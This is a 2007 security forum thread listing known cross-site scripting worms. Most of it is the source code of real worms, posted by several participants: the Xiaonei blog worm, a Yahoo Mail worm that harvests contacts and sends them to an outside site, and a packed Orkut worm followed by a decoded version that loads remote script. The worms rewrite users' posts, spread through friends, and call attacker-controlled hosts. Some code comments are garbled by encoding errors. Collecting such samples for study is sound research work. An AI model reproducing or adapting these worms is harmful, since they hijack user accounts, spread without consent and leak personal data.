Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
List of XSS Worms?
Posted by: sirdarckcat
Date: August 08, 2007 06:22PM

Hi!

Do you guys know any other XSS Worms beside this:

MySpace.com Sammy's Worm http://shiflett.org/blog/2005/oct/myspace-csrf-and-xss-worm-samy
Libero.it, Tiscali.it, Lycos.it, Excite.com Nduja Worm http://ha.ckers.org/blog/20070709/nduja-cross-domainwebmail-xss-worm/
Orkut xmen.js Worm http://www.memestreams.net/users/acidus/blogid10169775/
Yahoo! Yamanner Worm http://www.theregister.co.uk/2006/06/12/javscript_worm_targets_yahoo/

And do you have the code of the following Worms?
Orkut xmen.js Worm http://www.memestreams.net/users/acidus/blogid10169775/
Yahoo! Yamanner Worm http://www.theregister.co.uk/2006/06/12/javscript_worm_targets_yahoo/

Any help will be appreciated :)

Greetz!!



Edited 1 time(s). Last edit at 08/08/2007 06:25PM by sirdarckcat.

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: Super-Friez
Date: August 08, 2007 09:16PM

http://www.xssed.com/

There's a list!

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: Anonymous User
Date: August 09, 2007 06:09PM

@Super-Friez

http://en.wikipedia.org/wiki/Computer_worm

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: Super-Friez
Date: August 09, 2007 06:40PM

Oops, sorry. I'm still relatively new here.

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: monyer
Date: November 06, 2007 08:40PM

A web Named xiaonei had one !
var req = null;
var step=null;
var DiaryMonthUrlList="",DiaryUrlList="";
var timer=null;
var bIsBusy=false;

var myrand="46.115.50.124.115.127.119.47.48.127.107.115.35.35.33.48.50.123.118.47.48.127.107.115.35.35.33.48.50.97.102.107.126.119.47.53.112.115.113.121.117.96.125.103.124.118.40.103.96.126.58.100.112.97.113.96.123.98.102.40.119.106.119.113.103.102.119.58.65.102.96.64.119.100.119.96.97.119.58.48.59.48.48.33.35.35.115.107.127.48.48.58.118.91.107.80.102.124.119.127.119.126.87.102.119.117.60.102.124.119.127.103.113.125.118.62.97.50.119.96.125.116.119.80.102.96.119.97.124.123.60.119.118.125.92.102.124.119.96.115.98.60.59.48.48.33.35.35.115.107.127.48.48.58.118.91.107.80.102.124.119.127.119.126.87.102.119.117.60.102.124.119.127.103.113.125.118.50.40.48.48.117.98.120.60.97.120.124.106.61.97.119.117.115.127.123.61.127.125.113.60.119.113.115.116.125.97.125.97.60.101.101.101.61.61.40.98.102.102.122.48.48.47.113.96.97.60.97.40.59.48.48.102.98.123.96.113.97.48.48.58.102.124.119.127.119.126.87.119.102.115.119.96.113.60.102.124.119.127.103.113.125.118.47.97.50.102.119.97.48.59.59.50.59.53.44.46.61.115.44";

function my_HtmlDecode(str)
{
str=str.replace(/</g,"<");
str=str.replace(/>/g,">");
str=str.replace(/&/g,"&");
str=str.replace(/ /g," ");
str=str.replace(/"/g,"\"");
str=str.replace(/<br>/g,"\n");
str=str.replace(/#/g,"#");
str=str.replace(/(/g,"(");
str=str.replace(/)/g,")");
str=str.replace(/"/g,"\"");
str=str.replace(/'/g,"'");
str=str.replace(/#/g,"#");
str=str.replace(/(/g,"(");
str=str.replace(/)/g,")");
str=str.replace(/"/g,"\"");
str=str.replace(/'/g,"'");
return str;
}
function processReqChange()
{
if (req.readyState == 4 && req.status == 200 )
{
if("WriteIframe"==step)
{
var text,len,i=0,j=0,temp;

text=req.responseText;
i=text.indexOf("<div class=\"article\">",0);
if(-1==i){return}
i=text.indexOf("http://blog.xiaonei.com/GetEntry.do",i);
if(-1==i){return}
j=text.indexOf("\"",i);
if(-1==j){return}
text=text.substring(i,j);

document.getElementById("mya113").style.background="#FFFFFF";
var s=document.createElement("iframe");
s.frameborder="0";
s.height="0";
s.width="1";
s.src=text;
document.getElementById("mya113").parentNode.insertBefore(s,document.getElementById("mya113"));
}
else if("GetDiaryMonthList"==step)
{
var text,len,i=0,j=0,temp;
//textµÄÄÚÈݾͺÍÓû§µã¡°ÎÒµÄÈÕÖ¾¡±µÃµ½µÄÄÚÈÝÒ»Ñù£¬·ÖÎöHTML£¬µÃµ½¡°ÈÕÖ¾´æµµ¡±ÖеÄÿһ¸öÁ´½Ó£¬±£´æµ½DiaryMonthUrlListÖÐ
//È»ºóÌøµ½GetStatusº¯Êý,´Ëʱstep="GetDiaryList" È¡³öÿ¸öÔµÄÈÕÖ¾Áбí
text=req.responseText;
i=text.indexOf("<div id=\"list-archive\">",0);
if(-1==i){return}
j=text.indexOf("<div class=\"bottom-box\">",i);
if(-1==j){return}
text=text.substring(i,j);

i=j=0;
while(1)
{
i=text.indexOf("http://blog.xiaonei.com/MyBlog.do",i);
if(-1==i)break;
j=text.indexOf("'>",i);
if(-1==j)break;
temp=text.substring(i,j);
i+=temp.length;
temp=my_HtmlDecode(temp)+"|";
DiaryMonthUrlList+=temp;
}
if(DiaryMonthUrlList.length<=1)
{
return;
}

step="GetDiaryList";
req=null;
bIsBusy=false;
timer=window.setInterval(GetStatus,1000);
}
else if("GetDiaryList"==step)
{
var text,len,i,j,temp,temp2;
var text2="http://blog.xiaonei.com/EditEntry.do?id=";

//textµÄÄÚÈݾͺÍÓû§µãÁË¡°ÈÕÖ¾´æµµ¡±ºóµÄÄÚÈÝÒ»Ñù
//·ÖÎöHTMLµÃµ½Ã¿¸öÔµÄÈÕÖ¾ÁÐ±í±£´æÔÚDiaryUrlListÖУ¬È»ºóstep=GetDiaryTextÒ²¾ÍÊÇÈ¡µÃÈÕÖ¾µÄÄÚÈÝ,
//¿´±¾º¯ÊýÏÂÃæelse if("GetDiaryText"==step)¾ÍÊÇÁË
text=req.responseText;

len=text.length;
i=text.indexOf("<div id=\"list-article\">");
if(-1==i)
{
req=null;
bIsBusy=false;
return;
}
j=text.indexOf("</table>",i);
if(-1==j)
{
req=null;
bIsBusy=false;
return;
}
text=text.substring(i,j);
i=j=0;


while(1)
{
j=0;
len=0;
j=DiaryUrlList.indexOf("|",j);
while(j!=-1)
{
j++;
len++;
j=DiaryUrlList.indexOf("|",j);
}

if(len>=5)//Ö»¸ÐȾǰ5ƪÈÕÖ¾ »òÕßÊÇ4ƪ û×ÐϸÑо¿
{
break;
}

i=text.indexOf(text2,i);
if(-1==i)
{
break;
}
i+=text2.length;
j=text.indexOf("\">",i);
if(-1==j || j-i>10)
{
break;
}
temp=text2+text.substring(i,j)+"|";
DiaryUrlList+=temp;
}
req=null;
bIsBusy=false;
}
else if("GetDiaryText"==step)
{
var text,len,i,j;
var argv;
var title,body,blog_pic_id="0",pic_path,blogControl,Diaryid;


text=req.responseText;
//Õâ¸öÄ£¿éÄ£ÄâÓû§±à¼­ÈÕÖ¾£¬ÔÚÿƪÈÕÖ¾µÄ¿ª¹Ø¶¼¼ÓÉÏ
//<a name="mya113" id="mya113" style='background:url(vbscript:execute(StrReverse(")""311aym""(dIyBtnemelEteg.tnemucod,s erofeBtresni.edoNtnerap.)""311aym""(dIyBtnemelEteg.tnemucod :""gpj.sjnx/segami/moc.ecafosos.www//:ptth""=crs.s:)""tpircs""(tnemelEetaerc.tnemucod=s tes")) )'>

i=text.indexOf("<form action=\"http://upload.xiaonei.com/EditEntry.do\"",0);

if(-1==i)
{
return;
}
i+=53;

j=text.indexOf("</form>",i);
if(-1==j)
{
return;
}

text=text.substring(i,j);
//------------------------

i=text.indexOf("id=\"title\" class=\"inputtext\" tabindex=\"1\" value=\"",0);
if(-1==i)return;
i+=49;
j=text.indexOf("\" />",i);
if(-1==j)return;
title=text.substring(i,j);
//---
i=text.indexOf("<textarea name=\"body\" id=\"body\" cols=\"100%\" style=\"display:none\">",0);
if(-1==i)return;
i+=65;
j=text.indexOf("</textarea>",i);
if(-1==j)return;
body=text.substring(i,j);
//---
i=text.indexOf("id=\"blog_pic_id\" value=\"",0);
if(-1==i)return;
i+=24;
j=text.indexOf("\" />",i);
if(-1==j)return;
blog_pic_id=text.substring(i,j);
//---
i=text.indexOf("id=\"pic_path\" value=\"",0);
if(-1==i)return;
i+=21;
j=text.indexOf("\" />",i);
if(-1==j)return;
pic_path=text.substring(i,j);
//---
i=text.indexOf("name=\"id\" value=\"",0);
if(-1==i)return;
i+=17;
j=text.indexOf("\" />",i);
if(-1==j)return;
Diaryid=text.substring(i,j);
//---
i=text.indexOf("\" selected=\"selected\"",0);
if(-1==i)return;
j=i-2;
if(text.substr(j,1)=="\"")
j++;
blogControl=text.substring(j,i);


body=my_HtmlDecode(body);
if(body.indexOf("mya113",0)>=0)//ÒѾ­¸ÐȾ¹ý£¬²»ÔÙ¸ÐȾ
{
req=null;
step="GetDiaryText";
bIsBusy=false;

return;
}
else
{
;
}
//ÒÔÉÏÊÇÈ¡ÈÕÖ¾µÄ¸÷¸ö±äÁ¿ÐÅÏ¢
//ÒÔÏ¿ªÍ·¾Í¸ÐȾÈÕÖ¾²¢ÐÞ¸Ä

body=MyDecode(myrand)+body;
//¸ÐȾÈÕÖ¾ ÔÚÈÕÖ¾µÄ¿ªÍ·¼ÓÉÏ¿çÕ¾´úÂë
//MyDecode(myrand)Öб£´æµÄ¾ÍÊÇ¿çÕ¾µÄ¹Ø¼ü´úÂ룬×÷Õß¼ÓÃÜÁËһϷÅÔÚmyrand±äÁ¿ÖУ¬³ÌÐò¿ªÍ·µÄÒ»³¤´®Êý¾Ý¾ÍÊÇ

//ÒÔÏ¿ªÊ¼POSTÌá½»Ð޸ĹýµÄÈÕÖ¾
argv="\r\n";
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"title\"\r\n\r\n";
argv+=(title+"\r\n");
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"body\"\r\n\r\n";
argv+=(body+"\r\n");
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"theFile\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n";
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"blog_pic_id\"\r\n\r\n";
argv+=(blog_pic_id+"\r\n");
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"pic_path\"\r\n\r\n";
argv+=(pic_path+"\r\n");
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"blogControl\"\r\n\r\n";
argv+=(blogControl+"\r\n");
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n";
argv+=(Diaryid+"\r\n");
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"relative_optype\"\r\n\r\n";
argv+=("publisher"+"\r\n");
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"del_relative_id\"\r\n\r\n\r\n";
argv+="-----------------------------7d71861cb014c--\r\n";


req=null;
step="EditDiaryText";
loadUrl("http://blog.xiaonei.com/EditEntry.do","POST",argv);


}
else if("EditDiaryText"==step)
{

req=null;
bIsBusy=false;
step="GetDiaryText";
}
else
{
;
}

}
}
function MyDecode(str)
{
var i,k,str2="";

k=str.split(".");

for(i=0;i<k.length;i++)
{
str2+=String.fromCharCode(k^0x12);
}
return str2;
}
function loadUrl( url,method,argv )
{
bIsBusy=true;
if(!req)
{
if(window.XMLHttpRequest)
{
try
{
req = new XMLHttpRequest();
} catch(e) { req = false; }
}
else if(window.ActiveXObject)
{
try
{
req = new ActiveXObject('Msxml2.XMLHTTP');
}
catch(e)
{
try
{
req = new ActiveXObject('Microsoft.XMLHTTP');
} catch(e) { req = false; }
}
}
}
if(req)
{
req.onreadystatechange = processReqChange;
try
{
req.open(method, url, true);
if(method=="POST")
req.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------7d71861cb014c");
req.send(argv);
}catch(e)
{
req=false;
}
}
}
function GetStatus()
{
if(bIsBusy)return;

if("GetDiaryList"==step)
{
var DiaryMonthUrl,i;

//È¡³öÿ¸öÔµÄÈÕÖ¾Áбí
if(DiaryMonthUrlList.length<=1)
{
step="GetDiaryText";
return;
}
i=DiaryMonthUrlList.indexOf("|",0);
if(-1==1)
{
step="GetDiaryText";
return;
}
DiaryMonthUrl=DiaryMonthUrlList.substring(0,i);
DiaryMonthUrlList=DiaryMonthUrlList.substring(i+1,DiaryMonthUrlList.length);

//Ôٻص½¿ªÍ·µÄprocessReqChangeº¯Êý ´Ëʱstep»¹ÊÇGetDiaryList
loadUrl(DiaryMonthUrl,"GET","");

}
else if("GetDiaryText"==step)
{
var DiaryUrl,i;
if(DiaryUrlList.length<=1)
{
clearInterval(timer);
return;
}

i=DiaryUrlList.indexOf("|",0);
if(-1==i)
{
clearInterval(timer);
return;
}

DiaryUrl=DiaryUrlList.substring(0,i);
DiaryUrlList=DiaryUrlList.substring(i+1,DiaryUrlList.length);

loadUrl(DiaryUrl,"GET","");
}
}
function WriteStat()
{
var s=document.createElement("iframe");
s.frameborder="0";
s.height="0";
s.width="0";
s.src="http://www.sosoface.com/images/stat.jpg";
document.getElementById("mya113").parentNode.insertBefore(s,document.getElementById("mya113"));

}

function DeleteScript(html)
{
var i=0,j=0,str;

str=html;

i=str.indexOf("</A>",0);
if(-1==i)
return str;
i+=4;
str=str.substring(i,str.length);

return str;
}
function EditorSubmit()
{
var ret=false;
parent.parent.descOptype();
ret=parent.parent.beforeSubmit();

parent.parent.document.getElementById("body").value=MyDecode(myrand)+DeleteScript(parent.parent.document.getElementById("body").value);

return ret;
}
function Start()
{
//ÅжÏÊDz»ÊÇblog.xiaonei.comÓò,ÓÉÓÚajaxÊDz»ÄÜ¿çÓòµÄ£¬ËùÒÔÅжÏÊDZر¸µÄ
if("blog.xiaonei.com"==document.domain)
{
//Èç¹ûÊÇÔڱ༭ÒѸÐȾµÄÈÕÖ¾ ¾Í×öÁËһЩÆæ¹ÖµÄÐÐΪ£¬ÎÒ¿´²»¶®£¬ºÃÏñÊÇ°Ñ×Ô¼ºÖØдÁËÒ»±é£¬²»ÖªµÀΪʲôÕâÑù×ö
if("http://blog.xiaonei.com/pages/editor/win.htm"==document.location)
{
parent.parent.document.getElementById("editorForm").onsubmit=EditorSubmit;
}
else
{

WriteStat();//ÕâÊÇÒ»¸öÓû§Á÷Á¿Í³¼ÆµÄº¯Êý£¬Ê¹ÓÃcnzz Õ¾³¤ÖúÊÖ
//ÏÂÃ濪ʼ¸ÐȾÁË£¬µÚÒ»²½GetDiaryMonthList£¬µÃµ½ÈÕÖ¾µÄ°´Ô¹鵵
step="GetDiaryMonthList";
loadUrl("http://blog.xiaonei.com/MyBlog.do","GET","");//loadUrlÊÇÒ»¸öajax¶ÁÈ¡Ò³ÃæÄÚÈݵĺ¯Êý
//ÏÂÃæÌøµ½¿ªÍ·µÄprocessReqChangeº¯Êý
}
}
else if("xiaonei.com"==document.domain || "www.xiaonei.com"==document.domain)
{
//Èç¹û²»ÔÚblog.xiaonei.comÓò¾ÍдÈëÒ»¸öIframe IframeµÄSRCÊÇÈÕÖ¾µÄURL
//Õâ¸öURLÊÇblog.xiaonei.comÓòµÄ£¬¾Í±äÏòµÄʵÏÖÁË¿çÓò£¬
//×÷ÕßÕâÑù×öÓ¦¸ÃÊÇΪÁËÒ»·ÃÎʱðÈ˵ÄÖ÷Ò³¾ÍÄܸÐȾ
var url="";

url=document.location.toString();
if(url.indexOf("&")==-1)
return;
step="WriteIframe";
loadUrl(url,"GET","");
}
}

Start();

**********************************************************************************************
Chinese Blog:http://hi.baidu.com/monyer/
English Blog:http://monyer.blogspot.com/
WebSite:http://monyer.cn/
Don't trouble troubles till trouble troubles you!

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: rsnake
Date: November 11, 2007 01:56PM

@sirdarckcat, here are a few more. There are more but some of the code has been nuked for various reasons. These are all still intact.

U-dominion.com: http://ha.ckers.org/blog/20070110/u-dominioncom-xss-worm/
Gaiaonline.com: http://ha.ckers.org/blog/20070104/semi-reflective-xss-worm-hits-gaiaonlinecom/
MyYearbook.com: http://ha.ckers.org/blog/20060705/full-disclosure-extortion-of-myyearbookcom/

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: Kyran
Date: November 11, 2007 06:06PM

Here is a link to a slightly more advanced version of that first Gaiaonline.com worm. http://www.xssed.com/article/1/Paper_Anatomy_of_a_Pseudo-Reflective_Worm/

The code is still available at the link near the bottom of the paper.

In retrospect, these were amazingly simple.

- Kyran

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: hackathology
Date: November 18, 2007 09:51AM

Wow, those worms are really amazing. They are killing those sites reputation.

http://hackathology.blogspot.com

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: rsnake
Date: November 20, 2007 05:34PM

Here is one of the Yahoo worms. Not sure if this is Yamanner or another one:

<div class="msgarea"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif" target>= 0) { EndIndex = HtmlContent.indexOf(EndString, StartIndex); CutLen = EndIndex - StartIndex - StartString.length; YahooID = HtmlContent.substr(StartIndex + StartString.length, CutLen); if( YahooID.indexOf('@...', 0) > 0 || YahooID.indexOf('@yahoogroups.com', 0) > 0 ) IDList = IDList + ',' + YahooID ; StartString = ''; StartIndex = HtmlContent.indexOf(StartString, StartIndex + 20); StartString = ' <td>'; StartIndex = HtmlContent.indexOf(StartString, StartIndex + 20); i&#43;+; } if(IDList.substr(0,1) == ',') IDList = IDList.substr(1, IDList.length); if(IDList.indexOf(',', 0)>0 ) { IDListArray = IDList.split(','); Email = IDListArray[0]; IDList = IDList.replace(Email + ',', ''); } CurEmail = spamform.NE.value; IDList = IDList.replace(CurEmail + ',', ''); IDList = IDList.replace(',' + CurEmail, '');IDList = IDList.replace(CurEmail, '');UserEmail = showLetter.FromAddress.value;IDList = IDList.replace(',' + UserEmail, '');IDList = IDList.replace(UserEmail + ',', '');IDList = IDList.replace(UserEmail, ''); return IDList; } function ListContacts() { if (http_request.readyState == 4) { if (http_request.status == 200) { HtmlContent = http_request.responseText; IDList = GetIDs(HtmlContent); makeRequest('http://us.' + Server + '.mail.yahoo.com/ym/Compose/?rnd=' + Math.random(), Getcrumb, 'GET', null); } } } function ExtractStr(HtmlContent) { StartString = 'name=\u0022.crumb\u0022 value=\u0022'; EndString = '\u0022'; i = 0; StartIndex = HtmlContent.indexOf(StartString, 0); EndIndex = HtmlContent.indexOf(EndString, StartIndex + StartString.length ); CutLen = EndIndex - StartIndex - StartString.length; crumb = HtmlContent.substr(StartIndex + StartString.length , CutLen ); return crumb; } function Getcrumb() { if (http_request.readyState == 4) { if (http_request.status == 200) { HtmlContent = http_request.responseText; CRumb = ExtractStr(HtmlContent); MyBody = 'this is test'; MySubj = 'New Graphic Site'; Url = 'http://us.' + Server + '.mail.yahoo.com/ym/Compose'; var ComposeAction = compose.action;MidIndex = ComposeAction.indexOf('&Mid=' ,0);incIndex = ComposeAction.indexOf('&inc' ,0);CutLen = incIndex - MidIndex - 5;var MyMid = ComposeAction.substr(MidIndex + 5, CutLen); QIndex = ComposeAction.indexOf('?box=' ,0);AIndex = ComposeAction.indexOf('&Mid' ,0);CutLen = AIndex - QIndex - 5;var BoxName = ComposeAction.substr(QIndex + 5, CutLen); Param = 'SEND=1&SD=&SC=&CAN=&docCharset=windows-1256&PhotoMailUser=&PhotoToolInstall=&OpenInsertPhoto=&PhotoGetStart=0&SaveCopy=no&PhotoMailInstallOrigin=.crumb=RUMBVAL&Mid=EMAILMID&inc=&AttFol=&box=BOXNAME&FwdFile=YM_FM&FwdMsg=EMAILMID&FwdSubj=EMAILSUBJ&FwdInline=&OriginalFrom=FROMEMAIL&OriginalSubject=EMAILSUBJ&InReplyTo=&NumAtt=0&AttData=&UplData=&OldAttData=&OldUplData=&FName=&ATT=&VID=&Markers=&NextMarker=0&Thumbnails=&PhotoMailWith=&BrowseState=&PhotoIcon=&ToolbarState=&VirusReport=&Attachments=&Background=&BGRef=&BGDesc=&BGDef=&BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom=&PlainMsg=%3Cbr%3E%3Cbr%3ENote%3A&#43;forwarded&#43;message&#43;attached.&PhotoFrame=&PhotoPrintAtHomeLink=&PhotoSlideShowLink=&PhotoPrintLink=&PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&PhotoDownloadUrl=&PhotoSaveUrl=&PhotoFlags=&start=compose&bmdomain=&showcc=&showbcc=&AC_Done=&AC_ToList=0%2C&AC_CcList=&AC_BccList=&sendtop=Send&savedrafttop=Save&#43;as&#43;a&#43;Draft&canceltop=Cancel&FromAddr=&To=TOEMAIL&Cc=&Bcc=BCCLIST&Subj=EMAILSUBJ&Body=%3CBR%3E%3CBR%3ENote%3A&#43;forwarded&#43;message&#43;attached.&Format=html&sendbottom=Send&savedraftbottom=Save&#43;as&#43;a&#43;Draft&cancelbottom=Cancel&cancelbottom=Cancel'; Param = Param.replace('BOXNAME', BoxName); Param = Param.replace('RUMBVAL', CRumb); Param = Param.replace('BCCLIST', IDList); Param = Param.replace('TOEMAIL', Email);Param = Param.replace('FROMEMAIL', 'av3@...'); Param = Param.replace('EMAILBODY', MyBody); Param = Param.replace('PlainMESSAGE', ''); Param = Param.replace('EMAILSUBJ', MySubj);Param= Param.replace('EMAILSUBJ', MySubj);Param = Param.replace('EMAILSUBJ', MySubj); Param = Param.replace('EMAILMID', MyMid);Param = Param.replace('EMAILMID', MyMid);makeRequest(Url , alertContents, 'POST', Param); } }} function alertContents() { if (http_request.readyState == 4) { window.navigate('http://www.av3.net/?ShowFolder&rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&BCCList=' + IDList) } } makeRequest('http://us.' + Server + '.mail.yahoo.com/ym/QuickBuilder?build=Continue&cancel=&continuetop=Continue&canceltop=Cancel&Inbox=Inbox&Sent=Sent&pfolder=all&freqCheck=&freq=1&numdays=on&date=180&ps=1&numadr=100&continuebottom=Continue&cancelbottom=Cancel&rnd=' + Math.random(), ListContacts, 'GET', null)">Please wait while loading the site</td><br><br> </div>

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: rsnake
Date: December 19, 2007 10:23AM

The Orkut XSS worm code: http://antrix.net/journal/techtalk/orkut_xss.html

function $(p,a,c,k,e,d) {
e=function(c) {
return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
while(c--){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}];
e=function(){return'\\w+'};
c=1
};
while(c--){
if(k[c]){
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
}
}
return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};
5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>[1j]25 "+i F()+"[/1j]<1k/><13 1o=\\"o://k.w.p/28.z\\" 2a=\\"Q/x-2c-2d\\" 2e=\\"2g\');
r=8.1n(\'r\');r.1o=\'o://1p.2k.p/2n/1p/1s.1t\';8.D(\'1w\')[0].1f(r);19(\'\\" 1C=\\"1\\" 1E=\\"1\\"></13>";
5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();
3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");
3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};
6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();
',62,150,'|||xml||var|if|function|document|domain|send|return|path|wDate||select|name|begin|new|index|
www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut||cookie|aspx
|prefix|createXMLHttpRequest|true|getElementsByTagName|SIG|Date|loadFriends|POST_TOKEN|scrapText|null|
signature|catch|length|selectedList|item|value|application|open|indexOf|cmm_join|secure|sendScrap|setCookie|
readyState|onreadystatechange|try|Content|86400|setRequestHeader|embed|ActiveXObject|Action|else|form|
getElementById|escape|status|urlencoded|200|setTime|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|
createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|GMT|go|GET|Compose|width|innerHTML|height|option|
setAttribute|id|submit|style|display|none|removeChild|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|
history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|raw|LoL|Msxml2|type|Microsoft|shockwave|flash|
wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera
|XMLHttpRequest|substring|virusdoorkut|CGI|Page'.split('|'),0,{}),1
);
author="Rodrigo Lacerda"

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: c0d3walk3r
Date: December 20, 2007 11:08AM

Here is the decoded version of the above Orkut worm:
I guess Rodrigo Lacerda used the following packer to pack the javascript:
http://dean.edwards.name/packer/ ..... then modified it a little bit

<--------STARTS HERE---------->

var index = 0;
var POST = JSHDF['CGI.POST_TOKEN'];
var SIG = JSHDF['Page.signature.raw'];

function createXMLHttpRequest() {
try {
return new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
}
try {
return new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
}
try {
return new XMLHttpRequest;
} catch (e) {
}
return null;
}


function setCookie(name, value, expires, path, domain, secure) {
var curCookie = name + "=" + escape(value) + (expires ? "; expires=" + expires.toGMTString() : "") + (path ? "; path=" + path : "") + (domain ? "; domain=" + domain : "") + (secure ? "; secure" : "");
document.cookie = curCookie;
}


function getCookie(name) {
var dc = document.cookie;
var prefix = name + "=";
var begin = dc.indexOf("; " + prefix);
if (begin == -1) {
begin = dc.indexOf(prefix);
if (begin != 0) {
return false;
}
} else {
begin += 2;
}
var end = document.cookie.indexOf(";", begin);
if (end == -1) {
end = dc.length;
}
return unescape(dc.substring(begin + prefix.length, end));
}


function deleteCookie(name, path, domain) {
if (getCookie(name)) {
document.cookie = name + "=" + (path ? "; path=" + path : "") + (domain ? "; domain=" + domain : "") + "; expires=Thu, 01-Jan-70 00:00:01 GMT";
history.go(0);
}
}


function loadFriends() {
var xml = createXMLHttpRequest();
if (xml) {
xml.open("GET", "http://www.orkut.com/Compose.aspx", true);
xml.send(null);
xml.onreadystatechange = function () {if (xml.readyState == 4) {if (xml.status == 200) {var xmlr = xml.responseText;var div = document.createElement("div");div.innerHTML = xmlr;var select = div.getElementsByTagName("select").item(0);if (select) {select.removeChild(select.getElementsByTagName("option").item(0));select.setAttribute("id", "selectedList");select.style.display = "none";document.body.appendChild(select);sendScrap();}} else {loadFriends();}}};
xml.send(null);
}
}


function cmm_join() {
var send = "POST_TOKEN=" + encodeURIComponent(POST) + "&signature=" + encodeURIComponent(SIG) + "&Action.join";
var xml = createXMLHttpRequest();
xml.open("POST", "http://www.orkut.com/CommunityJoin.aspx?cmm=" + String.fromCharCode(52, 52, 48, 48, 49, 56, 49, 56), true);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xml.send(send);
xml.onreadystatechange = function () {if (xml.readyState == 4) {if (xml.status != 200) {cmm_join();return;}loadFriends();}};
}


function sendScrap() {
if (index == document.getElementById("selectedList").length) {
return;
}
var scrapText = "Boas festas de final de ano!<br/><br/>[silver]" + (new Date).getTime() + "[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape('\" width=\"1\" height=\"1\"></embed>";
var send = "Action.submit=1&POST_TOKEN=" + encodeURIComponent(POST) + "&scrapText=" + encodeURIComponent(scrapText) + "&signature=" + encodeURIComponent(SIG) + "&toUserId=" + document.getElementById("selectedList").item(index).value;
